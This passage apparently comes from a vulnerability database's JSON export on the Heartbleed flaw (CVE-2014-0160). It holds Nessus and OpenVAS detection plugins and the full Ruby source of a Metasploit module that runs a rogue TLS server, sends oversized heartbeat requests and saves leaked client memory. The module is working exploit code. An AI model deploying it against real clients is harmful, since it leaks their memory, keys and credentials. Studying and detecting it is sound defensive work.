Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libopenssl-devel-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libopenssl1_0_0-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libopenssl1_0_0-debuginfo-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"openssl-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"openssl-debuginfo-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"openssl-debugsource-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libopenssl-devel-32bit-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-32bit-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-debuginfo-32bit-1.0.1e-1.44.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libopenssl-devel-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libopenssl1_0_0-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libopenssl1_0_0-debuginfo-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openssl-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openssl-debuginfo-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"openssl-debugsource-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libopenssl-devel-32bit-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-32bit-1.0.1e-11.32.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-debuginfo-32bit-1.0.1e-11.32.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libopenssl-devel / libopenssl-devel-32bit / libopenssl1_0_0 / etc\");\n}\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-01T03:46:00", "description": "The remote host has a version of McAfee VirusScan Enterprise for Linux\n(VSEL) that is affected by an information disclosure due to a flaw in\nthe OpenSSL library, commonly known as the Heartbleed bug. An attacker\ncould potentially exploit this vulnerability repeatedly to read up to\n64KB of memory from the device.", "edition": 25, "published": "2014-05-03T00:00:00", "title": "McAfee VirusScan Enterprise for Linux OpenSSL Information Disclosure (SB10071) (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mcafee:virusscan_enterprise"], "id": "MCAFEE_VSEL_SB10071.NASL", "href": "https://www.tenable.com/plugins/nessus/73854", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73854);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10071\");\n\n script_name(english:\"McAfee VirusScan Enterprise for Linux OpenSSL Information Disclosure (SB10071) (Heartbleed)\");\n script_summary(english:\"Checks VSEL version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee VirusScan Enterprise for Linux\n(VSEL) that is affected by an information disclosure due to a flaw in\nthe OpenSSL library, commonly known as the Heartbleed bug. An attacker\ncould potentially exploit this vulnerability repeatedly to read up to\n64KB of memory from the device.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10071\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant hotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:virusscan_enterprise\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mcafee_vsel_detect.nbin\");\n script_require_keys(\"installed_sw/McAfee VirusScan Enterprise for Linux\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"McAfee VirusScan Enterprise for Linux\";\nget_install_count(app_name:app_name, exit_if_zero:TRUE);\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nhotfixes = install['Hotfixes'];\nmax_hotfix = int(install['max_hotfix']);\nvuln = FALSE;\n\n# Determine fix.\nif (version =~ \"^1\\.7\\.1\\.\")\n{\n max = \"1.7.1.28698\";\n hotfix = \"HF-961964\";\n}\nelse if (version =~ \"^1\\.9\\.\")\n{\n max = \"1.9.0.28822\";\n hotfix = \"HF-960962\";\n}\nelse if (version =~ \"^2\\.0\\.\")\n{\n max = \"2.0.0.28948\";\n hotfix = \"HF-960961\";\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n\nif (ver_compare(ver:version, fix:max, strict:FALSE) <= 0)\n{\n if (report_paranoia > 1 && !isnull(hotfixes) && hotfix >!< hotfixes) vuln = TRUE;\n else\n {\n hotfix_int = int(hotfix - \"HF-\");\n if (max_hotfix < hotfix_int) vuln = TRUE;\n }\n}\n\nif (vuln)\n{\n port = 0;\n\n if (report_verbosity > 0)\n {\n report = '\\n' + app_name + ' ' + version + ' is missing patch ' + hotfix + '.\\n';\n security_warning(extra:report, port:port);\n }\n else security_warning(port:port);\n exit(0);\n}\nelse audit(AUDIT_PATCH_INSTALLED, hotfix + \" or later\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2020-10-08T00:09:20", "description": "This module provides a fake SSL service that is intended to leak memory from client systems as they connect. This module is hardcoded for using the AES-128-CBC-SHA1 cipher.\n", "published": "2014-04-09T14:38:11", "type": "metasploit", "title": "OpenSSL Heartbeat (Heartbleed) Client Memory Exposure", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2020-05-17T19:51:14", "id": "MSF:AUXILIARY/SERVER/OPENSSL_HEARTBEAT_CLIENT_MEMORY", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TcpServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Client Memory Exposure',\n 'Description' => %q{\n This module provides a fake SSL service that is intended to\n leak memory from client systems as they connect. This module is\n hardcoded for using the AES-128-CBC-SHA1 cipher.\n },\n 'Author' =>\n [\n 'Neel Mehta', # Vulnerability discovery\n 'Riku', # Vulnerability discovery\n 'Antti', # Vulnerability discovery\n 'Matti', # Vulnerability discovery\n 'hdm' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [['Capture', 'Description' => 'Run server to disclose memory from incoming clients']],\n 'PassiveActions' => ['Capture'],\n 'DefaultAction' => 'Capture',\n 'References' =>\n [\n [ 'CVE', '2014-0160' ],\n [ 'US-CERT-VU', '720951' ],\n [ 'URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A' ],\n [ 'URL', 'http://heartbleed.com/' ]\n ],\n 'DisclosureDate' => 'Apr 07 2014',\n 'Notes' =>\n {\n 'AKA' => ['Heartbleed']\n }\n\n )\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 8443 ]),\n OptInt.new('HEARTBEAT_LIMIT', [true, \"The number of kilobytes of data to capture at most from each client\", 512]),\n OptInt.new('HEARTBEAT_READ', [true, \"The number of bytes to leak in the heartbeat response\", 65535]),\n OptBool.new('NEGOTIATE_TLS', [true, \"Set this to true to negotiate TLS and often leak more data at the cost of CA validation\", false])\n ])\n end\n\n # Initialize the client state and RSA key for this session\n def setup\n super\n @state = {}\n @cert_key = OpenSSL::PKey::RSA.new(1024){ } if negotiate_tls?\n end\n\n # Setup the server module and start handling requests\n def run\n print_status(\"Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...\")\n exploit\n end\n\n # Determine how much memory to leak with each request\n def heartbeat_read_size\n datastore['HEARTBEAT_READ'].to_i\n end\n\n # Determine how much heartbeat data to capture at the most\n def heartbeat_limit\n datastore['HEARTBEAT_LIMIT'].to_i * 1024\n end\n\n # Determine whether we should negotiate TLS or not\n def negotiate_tls?\n !! datastore['NEGOTIATE_TLS']\n end\n\n # Initialize a new state for every client\n def on_client_connect(c)\n @state[c] = {\n :name => \"#{c.peerhost}:#{c.peerport}\",\n :ip => c.peerhost,\n :port => c.peerport,\n :heartbeats => \"\",\n :server_random => [Time.now.to_i].pack(\"N\") + Rex::Text.rand_text(28)\n }\n print_status(\"#{@state[c][:name]} Connected\")\n end\n\n # Buffer messages and parse them once they are fully received\n def on_client_data(c)\n data = c.get_once\n return if not data\n @state[c][:buff] ||= \"\"\n @state[c][:buff] << data\n process_request(c)\n end\n\n # Extract TLS messages from the buffer and process them\n def process_request(c)\n\n # Make this slightly harder to DoS\n if @state[c][:buff].to_s.length > (1024*128)\n print_status(\"#{@state[c][:name]} Buffer limit reached, dropping connection\")\n c.close\n return\n end\n\n # Process any buffered messages\n loop do\n break unless @state[c][:buff]\n\n message_type, message_ver, message_len = @state[c][:buff].unpack(\"Cnn\")\n break unless message_len\n break unless @state[c][:buff].length >= message_len+5\n\n mesg = @state[c][:buff].slice!(0, message_len+5)\n\n if @state[c][:encrypted]\n process_openssl_encrypted_request(c, mesg)\n else\n process_openssl_cleartext_request(c, mesg)\n end\n end\n end\n\n # Process cleartext TLS messages\n def process_openssl_cleartext_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n if message_type == 0x15 and data.length >= 7\n message_level, message_reason = data[5,2].unpack(\"CC\")\n print_status(\"#{@state[c][:name]} Alert Level #{message_level} Reason #{message_reason}\")\n if message_level == 2 and message_reason == 0x30\n print_status(\"#{@state[c][:name]} Client rejected our certificate due to unknown CA\")\n return\n end\n\n if level == 2\n print_status(\"#{@state[c][:name]} Client rejected our connection with a fatal error: #{message_reason}\")\n return\n end\n\n end\n\n unless message_type == 0x18\n message_code = data[5,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, message_version, message_code)}\")\n end\n\n # Process the Client Hello\n unless @state[c][:received_hello]\n\n unless (message_type == 0x16 and data.length > 43 and message_code == 0x01)\n print_status(\"#{@state[c][:name]} Expected a Client Hello, received #{sprintf(\"type %.2x code %.2x\", message_type, message_code)}\")\n return\n end\n\n print_status(\"#{@state[c][:name]} Processing Client Hello...\")\n\n # Extract the client_random needed to compute the master key\n @state[c][:client_random] = data[11,32]\n @state[c][:received_hello] = true\n\n print_status(\"#{@state[c][:name]} Sending Server Hello...\")\n openssl_send_server_hello(c, data, protocol_version)\n return\n end\n\n # If we are negotiating TLS, handle Client Key Exchange/Change Cipher Spec\n if negotiate_tls?\n # Process the Client Key Exchange\n if message_type == 0x16 and data.length > 11 and message_code == 0x10\n print_status(\"#{@state[c][:name]} Processing Client Key Exchange...\")\n premaster_length = data[9, 2].unpack(\"n\").first\n\n # Extract the pre-master secret in encrypted form\n if data.length >= 11 + premaster_length\n premaster_encrypted = data[11, premaster_length]\n\n # Decrypt the pre-master secret using our RSA key\n premaster_clear = @cert_key.private_decrypt(premaster_encrypted) rescue nil\n @state[c][:premaster] = premaster_clear if premaster_clear\n end\n end\n\n # Process the Change Cipher Spec and switch to encrypted communications\n if message_type == 0x14 and message_code == 0x01\n print_status(\"#{@state[c][:name]} Processing Change Cipher Spec...\")\n initialize_encryption_keys(c)\n return\n end\n # Otherwise just start capturing heartbeats in clear-text mode\n else\n # Send heartbeat requests\n if @state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process cleartext heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Heartbeat received (#{data.length-5} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << data[5, data.length-5]\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n end\n\n # Process encrypted TLS messages\n def process_openssl_encrypted_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n return if @state[c][:shutdown]\n return unless data.length > 5\n\n buff = decrypt_data(c, data[5, data.length-5])\n unless buff\n print_error(\"#{@state[c][:name]} Failed to decrypt, giving up on this client\")\n c.close\n return\n end\n\n message_code = buff[0,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, message_version, message_code)}\")\n\n if message_type == 0x16\n print_status(\"#{@state[c][:name]} Processing Client Finished...\")\n end\n\n # Send heartbeat requests\n if @state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Encrypted heartbeat received (#{buff.length} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << buff\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Encrypted heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n\n # Dump captured memory to a file on disk using the loot API\n def store_captured_heartbeats(c)\n if @state[c][:heartbeats].length > 0\n begin\n path = store_loot(\n \"openssl.heartbleed.client\",\n \"application/octet-stream\",\n @state[c][:ip],\n @state[c][:heartbeats],\n nil,\n \"OpenSSL Heartbleed client memory\"\n )\n print_good(\"#{@state[c][:name]} Heartbeat data stored in #{path}\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception\n print_error(\"#{@state[c][:name]} Heartbeat data could not be stored: #{$!.class} #{$!}\")\n end\n\n # Report the memory disclosure as a vulnerability on the host\n report_vuln({\n :host => @state[c][:ip],\n :name => self.name,\n :info => \"Module #{self.fullname} successfully dumped client memory contents\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n }) rescue nil # Squash errors related to ip => 127.0.0.1 and the like\n end\n\n # Clear the heartbeat array\n @state[c][:heartbeats] = \"\"\n @state[c][:shutdown] = true\n end\n\n # Delete the state on connection close\n def on_client_close(c)\n # Do we have any pending heartbeats to save?\n if @state[c][:heartbeats].length > 0\n store_captured_heartbeats(c)\n end\n @state.delete(c)\n end\n\n # Send an OpenSSL Server Hello response\n def openssl_send_server_hello(c, hello, version)\n\n # If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the\n # first cipher suite sent by the client.\n if @state[c][:encrypted]\n cipher = \"\\x00\\x2F\"\n else\n cipher = hello[46, 2]\n end\n\n # Create the Server Hello response\n extensions =\n \"\\x00\\x0f\\x00\\x01\\x01\" # Heartbeat\n\n server_hello_payload =\n [version].pack('n') + # Use the protocol version sent by the client.\n @state[c][:server_random] + # Random (Timestamp + Random Bytes)\n \"\\x00\" + # Session ID\n cipher + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)\n \"\\x00\" + # Compression Method (none)\n [extensions.length].pack('n') + extensions\n\n server_hello = [0x02].pack(\"C\") + [ server_hello_payload.length ].pack(\"N\")[1,3] + server_hello_payload\n\n msg1 = \"\\x16\" + [version].pack('n') + [server_hello.length].pack(\"n\") + server_hello\n c.put(msg1)\n\n # Skip the rest of TLS if we arent negotiating it\n unless negotiate_tls?\n # Send a heartbeat request to start the stream and return\n openssl_send_heartbeat(c, version)\n return\n end\n\n # Certificates\n certs_combined = generate_certificates\n pay2 = \"\\x0b\" + [ certs_combined.length + 3 ].pack(\"N\")[1, 3] + [ certs_combined.length ].pack(\"N\")[1, 3] + certs_combined\n msg2 = \"\\x16\" + [version].pack('n') + [pay2.length].pack(\"n\") + pay2\n c.put(msg2)\n\n # End of Server Hello\n pay3 = \"\\x0e\\x00\\x00\\x00\"\n msg3 = \"\\x16\" + [version].pack('n') + [pay3.length].pack(\"n\") + pay3\n c.put(msg3)\n end\n\n # Send the heartbeat request that results in memory exposure\n def openssl_send_heartbeat(c, version)\n c.put \"\\x18\" + [version].pack('n') + \"\\x00\\x03\\x01\" + [heartbeat_read_size].pack(\"n\")\n end\n\n # Pack the certificates for use in the TLS reply\n def generate_certificates\n certs = []\n certs << generate_certificate.to_der\n certs_combined = certs.map { |cert| [ cert.length ].pack(\"N\")[1, 3] + cert }.join\n end\n\n # Generate a self-signed certificate to use for the service\n def generate_certificate\n key = @cert_key\n cert = OpenSSL::X509::Certificate.new\n cert.version = 2\n cert.serial = rand(0xFFFFFFFF)\n\n subject_cn = Rex::Text.rand_hostname\n subject = OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", subject_cn],\n ])\n issuer = OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n ])\n\n cert.subject = subject\n cert.issuer = issuer\n cert.not_before = Time.now - (3600 * 24 * 365) + rand(3600 * 14)\n cert.not_after = Time.now + (3600 * 24 * 365) + rand(3600 * 14)\n cert.public_key = key.public_key\n ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)\n cert.extensions = [\n ef.create_extension(\"basicConstraints\",\"CA:FALSE\"),\n ef.create_extension(\"subjectKeyIdentifier\",\"hash\"),\n ef.create_extension(\"extendedKeyUsage\",\"serverAuth\"),\n ef.create_extension(\"keyUsage\",\"keyEncipherment,dataEncipherment,digitalSignature\")\n ]\n ef.issuer_certificate = cert\n cert.add_extension ef.create_extension(\"authorityKeyIdentifier\", \"keyid:always,issuer:always\")\n cert.sign(key, OpenSSL::Digest::SHA1.new)\n cert\n end\n\n # Decrypt the TLS message and return the result without the MAC\n def decrypt_data(c, data)\n return unless @state[c][:client_enc]\n\n cipher = @state[c][:client_enc]\n\n begin\n buff = cipher.update(data)\n buff << cipher.final\n\n # Trim the trailing MAC signature off the buffer\n if buff.length >= 20\n return buff[0, buff.length-20]\n end\n rescue ::OpenSSL::Cipher::CipherError => e\n print_error(\"#{@state[c][:name]} Decryption failed: #{e}\")\n end\n\n nil\n end\n\n # Calculate keys and toggle encrypted status\n def initialize_encryption_keys(c)\n tls1_calculate_crypto_keys(c)\n @state[c][:encrypted] = true\n end\n\n # Determine crypto keys for AES-128-CBC based on the master secret\n def tls1_calculate_crypto_keys(c)\n @state[c][:master] = tls1_calculate_master_key(c)\n return unless @state[c][:master]\n\n key_block = tls1_prf(\n @state[c][:master],\n \"key expansion\" + @state[c][:server_random] + @state[c][:client_random],\n (20 * 2) + (16 * 4)\n )\n\n # Extract the MAC, encryption, and IV from the keyblock\n @state[c].update({\n :client_write_mac_key => key_block.slice!(0, 20),\n :server_write_mac_key => key_block.slice!(0, 20),\n :client_write_key => key_block.slice!(0, 16),\n :server_write_key => key_block.slice!(0, 16),\n :client_iv => key_block.slice!(0, 16),\n :server_iv => key_block.slice!(0, 16),\n })\n\n client_cipher = OpenSSL::Cipher.new('aes-128-cbc')\n client_cipher.key = @state[c][:client_write_key]\n client_cipher.iv = @state[c][:client_iv]\n client_cipher.decrypt\n client_mac = OpenSSL::HMAC.new(@state[c][:client_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n server_cipher = OpenSSL::Cipher.new('aes-128-cbc')\n server_cipher.key = @state[c][:server_write_key]\n server_cipher.iv = @state[c][:server_iv]\n server_cipher.encrypt\n server_mac = OpenSSL::HMAC.new(@state[c][:server_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n @state[c].update({\n :client_enc => client_cipher,\n :client_mac => client_mac,\n :server_enc => server_cipher,\n :server_mac => server_mac\n })\n\n true\n end\n\n # Determine the master key from the premaster and client/server randoms\n def tls1_calculate_master_key(c)\n return unless (\n @state[c][:premaster] and\n @state[c][:client_random] and\n @state[c][:server_random]\n )\n tls1_prf(\n @state[c][:premaster],\n \"master secret\" + @state[c][:client_random] + @state[c][:server_random],\n 48\n )\n end\n\n # Random generator used to calculate key data for TLS 1.0/1.1\n def tls1_prf(input_secret, input_label, output_length)\n # Calculate S1 and S2 as even blocks of each half of the secret\n # string. If the blocks are uneven, then S1's last byte should\n # be duplicated by S2's first byte\n blen = (input_secret.length / 2.0).ceil\n s1 = input_secret[0, blen]\n s2_index = blen\n if input_secret.length % 2 != 0\n s2_index -= 1\n end\n s2 = input_secret[s2_index, blen]\n\n # Hash the first part with MD5\n out1 = tls1_p_hash('md5', s1, input_label, output_length).unpack(\"C*\")\n\n # Hash the second part with SHA1\n out2 = tls1_p_hash('sha1', s2, input_label, output_length).unpack(\"C*\")\n\n # XOR the results together\n [*(0..out1.length-1)].map {|i| out1[i] ^ out2[i] }.pack(\"C*\")\n end\n\n # Used by tls1_prf to generate arbitrary amounts of session key data\n def tls1_p_hash(digest, secret, label, olen)\n output = \"\"\n chunk = OpenSSL::Digest.new(digest).digest_length\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n\n ctx.update(label)\n a1 = ctx.digest\n\n loop do\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx.update(a1)\n ctx_tmp.update(a1)\n ctx.update(label)\n\n if olen > chunk\n output << ctx.digest\n a1 = ctx_tmp.digest\n olen -= chunk\n else\n a1 = ctx.digest\n output << a1[0, olen]\n break\n end\n end\n\n output\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/openssl_heartbeat_client_memory.rb"}], "openvas": [{"lastseen": "2019-05-29T18:37:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2014-04-08T00:00:00", "id": "OPENVAS:1361412562310871154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871154", "type": "openvas", "title": "RedHat Update for openssl RHSA-2014:0376-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssl RHSA-2014:0376-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871154\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 12:13:57 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"RedHat Update for openssl RHSA-2014:0376-01\");\n\n\n script_tag(name:\"affected\", value:\"openssl on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:0376-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-April/msg00017.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 